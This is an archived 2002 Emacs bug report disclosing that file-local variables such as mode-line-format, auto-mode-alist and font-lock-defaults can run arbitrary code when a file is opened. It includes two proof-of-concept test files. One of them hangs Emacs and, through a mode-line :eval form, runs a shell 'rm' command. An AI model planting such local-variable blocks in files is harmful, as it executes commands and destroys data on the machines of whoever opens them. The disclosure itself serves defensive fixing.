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Security holes in risky-local-variable system


From: Jonathan Yavner
Subject: Security holes in risky-local-variable system
Date: Tue, 26 Mar 2002 23:22:43 -0500

[Reposted using preferred delivery protocol; also fix to test file #1]

Version: GNU Emacs 21.1.1 (i386-msvc-windows98.1998)

The following variables are risky and should have the
risky-local-variable attribute:
    auto-mode-alist
    minor-mode-overriding-map-alist
    overriding-local-map
Any of these could be used in the "Local Variables" area of a file in
order to create a Trojan horse; see test files below.

Another Trojan-horse method uses the frame parameter
`buffer-predicate', so any variable that defines frame parameters is
risky:
    default-frame-alist
    initial-frame-alist
    pop-up-frame-alist
    special-display-buffer-names
    special-display-frame-alist

The font-lock system uses callback functions, so its variables are
risky if global-font-lock-mode is enabled.  Also, the font-lock
initialization will happily set any variable for you, even those with
the risky-local-variable property:
    font-lock-defaults
    font-lock-keywords
    font-lock-syntactic-keywords

Because display properties can contain forms to be evaluated later,
any variable containing text that might be inserted into a buffer is
risky.  Examples:
    buffer-undo-list
    default-directory
    default-text-properties
I'm sure of these (see test files below), but there could be many
others.  Perhaps what's needed is a variable "display-eval-enable"
default nil, with risky-local-variable property?  Such a variable
would close this entire loophole, except in modes that really want it.

Because of the :eval keyword, any variable used for mode-line
formatting is also risky.  Examples:
    frame-title-format, global-mode-string, header-line-format,
    icon-title-format, input-method-alist, minor-mode-alist,
    mode-line-buffer-identification, mode-line-format,
    mode-line-frame-identification, mode-line-modified,
    mode-line-mule-info, mode-line-process, vc-mode
How about a new variable "mode-line-eval-enable", with
risky-local-variable property, default '(mode-line-mode-name), which
would be a list of functions that :eval would accept, or t to accept
everything?


!!The following test files are dangerous.  Read them before loading!!

Test file #1:  (give it the filename "x", change "$" below to ":",
                save, and reload)
..........snip here...................................................
For a moment's amusement, load this file and immediately type
  C-c r a s h
Maximize your enjoyment by not saving your other buffers first!

Other fun things to try:
  C-_
  C-x C-f x RET C-x k RET

;;; Local Variables$
;;; inhibit-quit: t
;;; overriding-local-map: (keymap (3 . (lambda ()
       (interactive)
       (while 1))))
;;; buffer-undo-list: (nil (#("Fun" 0 3 (display (height
       (progn (message "@buffer-undo-list") 2)))) . 1))
;;; default-directory: #("/tmp/" 0 5 (display (height
       (progn (message "@default-directory") 2))))
;;; mode-line-format: (:eval (progn
       (shell-command "rm /UNLIKELY/FILENAME*")
       "@mode-line-format"))
;;; End:
..........snip here...................................................



Test file #2:  (call it "y.el", enable global-font-lock first,
                change "$" below to ":", save and reload)
..........snip here...................................................
Some fun things to try:
  C-a C-\
  C-x C-w y RET
  C-x 5 2 C-x b RET

;;; Local Variables$
;;; auto-mode-alist: (("." . (lambda () (message "@auto-mode-alist"))))
;;; default-frame-alist: ((buffer-predicate . (lambda (x)
       (message "@default-frame-alist"))))
;;; font-lock-defaults: (((eval . (message "@font-lock-defaults#1")))
                   nil nil nil
                   (lambda (&rest x) (message "@font-lock-defaults#2"))
                   (load-path "@font-lock-defaults#3/"))
;;; mode: Outline-minor
;;; minor-mode-overriding-map-alist: ((outline-minor-mode keymap
                  (1 . (lambda () (interactive)
                       (error "@minor-mode-overriding-map-alist")))))
;;; default-text-properties: (display (height
               (progn (message "@default-text-properties") 0.5)))
;;; header-line-format: (:eval (message "@header-line-format"))
;;; input-method-alist: (("latin-1-prefix" "English"
          (lambda (x) (message "@input-method-alist"))
          "@" "Making trouble"))
;;; End:
.........snip here...................................................



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